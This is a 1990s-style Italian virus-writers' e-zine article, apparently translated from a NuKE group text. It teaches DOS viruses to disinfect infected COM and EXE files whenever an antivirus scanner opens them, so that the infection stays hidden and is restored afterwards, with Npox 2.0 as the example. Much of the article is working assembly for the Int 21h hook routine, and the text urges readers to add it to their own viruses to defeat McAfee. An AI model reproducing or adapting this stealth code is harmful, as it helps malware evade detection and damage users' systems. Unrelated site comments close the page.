La risposta Š semplice, ditemi voi chi ha in Italia un minimo di
organizzazione... e quindi io che sono specializzato in questo gruppo sui
virii, ma so fare anche altre cose..., mi sono preso la rottura di palle
NON PREOCCUPATEVI, MI FA PIACERE !!!, di tradurre ed aggiungere o comunque
modificare in positivo testi che a me piacciono. Comunque troverete anche
altri articoli miei. BUON DIVERTIMENTO !!! :))))
------------------------------------------------------------------------------

Il miglior vantaggio che un virus puo' avere Š la disinfezione al volo,
praticamente il virus deve rimanere nascosto il piu' possibile.
Questo Š un ottimo metodo di stealth, poichŠ l'antivirus non Š in grado
di disinfettare il file infetto, i programmi Anti-Virus diventeranno
semplicemente pazzi !!! eheheh :)
L'autore di questo testo ricorda quando fu creato il Npox 2.0 che si
disinfettava ogni volta che l'F-Prot e lo scan aprivano il file infetto,
dopo cio' il file veniva nuovamente infettato. Questa Š la routine
'Anti Fuck-Prot' che Š stata addata al virus, questa apriva il file tramite
Int21h/6C00H, Npox disinfettava solo su Int21h/3Dh, comunque creare il virus
che disinfetta su Int21h/6C00h, non richede molto lavoro, semplicemente
prendere le stringhe ASCII da DS:SI e mettere in SI dentro DX noi abbiamo
DS:DX che puntiamo su lui, mentre facciamo partire la routine.

Purtroppo non Š molto semplice da spiegare... comunque leggete avanti e
capirete :)

La semplice idea di disinfezione Š questa...
-Per i files .COM
Rimetti apposto i primi 3 bytes del programma, con quelli originali,
questi 3 bytes, infatti vengono usati dentro i virus per fare un jump
alla fine del file, per far partire il codice virale. Dopo essere saltati
alla fine del file COM e aver sottratto la lunghezza del virus dalla
lunghezza del file, avrete il nuovo un nuovo valore, la lunghezza del
file originale ! (Mi pare ovvio anche uno della Telecom lo capirebbe :)

NOTA: se il virus che hai scritto cambia lunghezza ad ogni infezione
(perchŠ Polimorfico) deve salvare la lunghezza del file prima di
infettarlo.

-Per i file EXE & Overlays
Questa procedure non Š differente, devi solamente cambiare il CS:IP &
SP:SS nel header EXE, rimetti apposto i valori originali, oppure, per
non perdere tempo, salva l'header EXE originale (il primo bytes 1b)
nel virus, come il Npox 2.0, questo lo sottraer… dalla lunghezza
originale e lo canceller….

L'autore ha usato la routine Closely nel suo virus Npox 2.0 che ti servir…
per capire questo processo

Okay, la prima cosa che devi fare Š controllare se il file infettato Š
un file COM o EXE, non perdere tempo con altre estensioni, poichŠ faresti
un codice troppo grande e il marchio delle 'infezioni' puo' fallire !
Ricorda che il virus usa come marchio i secondi, settati a 60 (come Npox).
Naturalmente solo i files infettati segneranno 60 secondi sulla data !
E questa routine non Š necessaria...

opening_file: call check_extension ;Cerca estensione .COM
jnc open_fuck2 ;SI; Jmp & Disinfetta
call check_exten_exe ;Cerca estensione .EXE
jnc open_fuck2 ;SI; Jmp & Disinfetta
jmp dword ptr cs:[int21] ;Per altre cose... vai al DOS

;A questo punto i file hanno un'estensione .COM o .EXE, continua...

open_fuck2: push ax ;Salva AX
mov ax,3d02h ;Pronto per aprire
call calldos21 ;Fai questo !
;NOTA: E' importante che chiami Int21h! Non devi dare un comando "Int 21h",
;il virus lo intercetta, e fa partire questa routine che continuer… sempre.
;A questo punto lo stack diventer… troppo grosso e sovrascriver… il codice
;e il sistema in circa 2 secondi...
jnc open_fuck1 ;Niente errori continua
pop ax ;Fa un restore
iret ;Esci

open_fuck1: push bx
push cx
push dx
push ds
mov bx,ax ;BX=handler del file
mov ax,5700h ;Prende la data del file
call calldos21

mov al,cl ;Muove i secondi in al
or cl,1fh ;Aggiusta i secondi
dec cx ;60 Seconds
xor al,cl ;compara...
jnz opening_exit3 ;Non sono 60 secondi... ESCI !

dec cx
mov word ptr cs:[old_time],cx ;Salva
mov word ptr cs:[old_date],dx ;Salva la data.

mov ax,4202h ;Vai alla fine del file
xor cx,cx
xor dx,dx
call calldos21

mov cx,dx ;Salva la lunghezza del file
mov dx,ax ;ci servir… dopo per
;sottrarre la lunghezza del
push cx ;virus dal programma.
push dx ;Salva il programma...

Adesso prendiamo i primi 3 bytes (per i files com) o i primi 1B bytes
(EXE header) nel virus Nuke Pox io salvo i 3 bytes originali del file .com
alla vera fine! Il buffer che ho creato fu di 1B hex bytes, che serve per
immetterci l'header del file EXE o i 3 bytes del file .com, l'inizio dei
3 bytes Š la fine dei 1B bytes, quindi Š alla fine... salvaci allora i 3
bytes o l'header exe per il tuo virus, oppure usa la routine del Npox...

sub dx,1Bh ;Sottrae 1B bytes dalla
sbb cx,0 ;lunghezza del file !
mov ax,4200h ;Ora il nostro puntatore
call calldos21 ;si "punta" sull'1B bytes
;Dove ci sono i bytes
;originali del file COM & EXE
push cs
pop ds ;CS=DS (for exes)

mov ah,3fh ;Questo legge nel buffer
mov cx,1Bh ;1B bytes
mov dx,offset buffer ;sul nostro buffer
call calldos21

Ora noi prendiamo i bytes originali, per scriverli dietro all'inizio del
file...

xor cx,cx ;Va' all'inizio del file
xor dx,dx ;
mov ax,4200h
call calldos21

mov ah,40h ;scrive i primi 3 bytes
mov dx,offset buffer ;nostro buffer
mov cx,1Bh ;1B bytes per i file EXE
cmp word ptr cs:[buffer],5A4Dh
je open_exe_jmp ;Se Š un file exe jump
mov cx,3h ;Se Š un file com scrivi 3 bytes
open_exe_jmp: call calldos21

Ora scriviamo i dati originali del file da piazzare, ora ci serve tagliare il
virus fuori dal file, il virus Š scritto alla fine del file, ora dobbiamo
settare il nostro puntatore del file al EOF - Virus_Size, cosi' prendiamo
la lunghezza originale del file !

pop dx ;EOF - Virus_Size
pop cx ;La lunghezza del file
sub dx,virus_size ;sottrae la lunghezza virus
sbb cx,0
mov ax,4200h
call calldos21

In questa parte del virus, la nostra nuova locazione ptr che verr… scritta da
bytes 0, il Dos crea quella nuova locazione il nuovo EoF e il virus risulter…
tagliato e cancellato il suo settore nella fat.

mov ah,40h ;Scrivi nuovo EOF
xor cx,cx ;Zero Bytes
call calldos21 ;fai questo

mov cx,word ptr cs:[old_time] ;Fa un restore del tempo
mov dx,word ptr cs:[old_date] ;Fa un restore della data
mov ax,5701h
int 21h

mov ah,3eh ;Chiude il file
call calldos21

opening_exit3: pop ds
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:[int21] ;Ritorna a DOS...

Il file Š stato disinfettato, ora possiamo ritornare al DOS che parir… il
file per l'ispezione...

Rock Steady/NuKE

--> Tradotto e modificato da: Li-Nux
--> [UnDeR CoNsTrUcTiOn] --- ThE BeSt GrOuP In ThE WoRlD

------------------------------------------------------------------------------

Allora, adesso che avete queste bellissime informazioni, potrete prendere il
vostro virus e modificarlo... eheheh :)
RICORDO CHE QUESTO TRUCCO FUNZIONA SOLO CON MCAFEE
Comunque, state certi che vi forniro' il metodo per il famoso ThunderByte
Antivirus... Chiunque gli Š piaciuto l'articolo, vuole aiuto, ecc... mi
puo' contattare a: hpavc@cryogen.com
Comunque mi puo' trovare in IRCnet tranquillamente, il mio nick Š: Li-Nux

UN SALUTO A TUTTI VOI E SOPRATTUTTO A TUTTI I MEMBRI DEL BELLISSIMO GRUPPO
[UnDeR CoStRuCtIoN]

------------------------------------------------------------------------------

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ þ UnDeR CoNsTrUcTiOn þ [Nø0001] ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ þ Bene siamo arrivati alla fine di questa "splendida" (per me e spero ³
³ anche per tutti coloro che leggono) e-zine !!! Scusateci gli eventuali ³
³ errori grammaticali e/o di scrittura, se vi interessa avere informazioni³
³ supplementari, volete essere aiutati, volete giudicare il nostro lavoro,³
³ magari migliorandolo con le vostre richieste, oppure volete contribuire ³
³ alla stesura di qualche articolo di questa e-zine, contattateci alla ³
³ seguente e-mail: u_construction@hotmail.com ³
³ ³
³ Vogliamo soddisfare le vostre richieste, vogliamo lavorare per creare ³
³ una piu' fondata conoscenza underground, siamo qui per questo, ³
³ continueremo per questo, questo numero... Š nulla... ma Š nostro siamo ³
³ partiti da zero e continueremo cosi' !!! ³
³ [UnDeR CoNsTrUcTiOn] ³
³ Un saluto ai lettori ³
³ da parte di tutti i ³
³ MEMBRI !!!!!!!!!!!!! ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
>>>>>>>>>> IRC-NET
>>>>>>>>>> #phreak.it








loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
6 Nov 2024
Thank you! I've corrected the date in the article. However, some websites list January 1980 as the date of death.

guest's profile picture
@guest
5 Nov 2024
Crespi died i april 1982, not january 1980.

guest's profile picture
@guest
4 Nov 2024
In 1955, the explorer Thor Heyerdahl managed to erect a Moai in eighteen days, with the help of twelve natives and using only logs and stone ...

guest's profile picture
@guest
4 Nov 2024
For what unknown reason did our distant ancestors dot much of the surface of the then-known lands with those large stones? Why are such cons ...

guest's profile picture
@guest
4 Nov 2024
The real pyramid mania exploded in 1830. A certain John Taylor, who had never visited them but relied on some measurements made by Colonel H ...

guest's profile picture
@guest
4 Nov 2024
Even with all the modern technologies available to us, structures like the Great Pyramid of Cheops could only be built today with immense di ...

lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
2 Nov 2024
In Sardinia, there is a legend known as the Legend of Tirrenide. Thousands of years ago, there was a continent called Tirrenide. It was a l ...

guest's profile picture
@guest
2 Nov 2024
What is certain is that the first Greek geographer to clearly place the Pillars of Hercules at Gibraltar was Eratosthenes (who lived between ...

guest's profile picture
@guest
1 Nov 2024
Disquieting thc drinks has been quite the journey. As someone keen on unpretentious remedies, delving into the in every respect of hemp has ...

guest's profile picture
@guest
29 Oct 2024
hi Good day I am writing to inform you of recent developments that may impact our ongoing operations. This morning, global news outlets hav ...
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT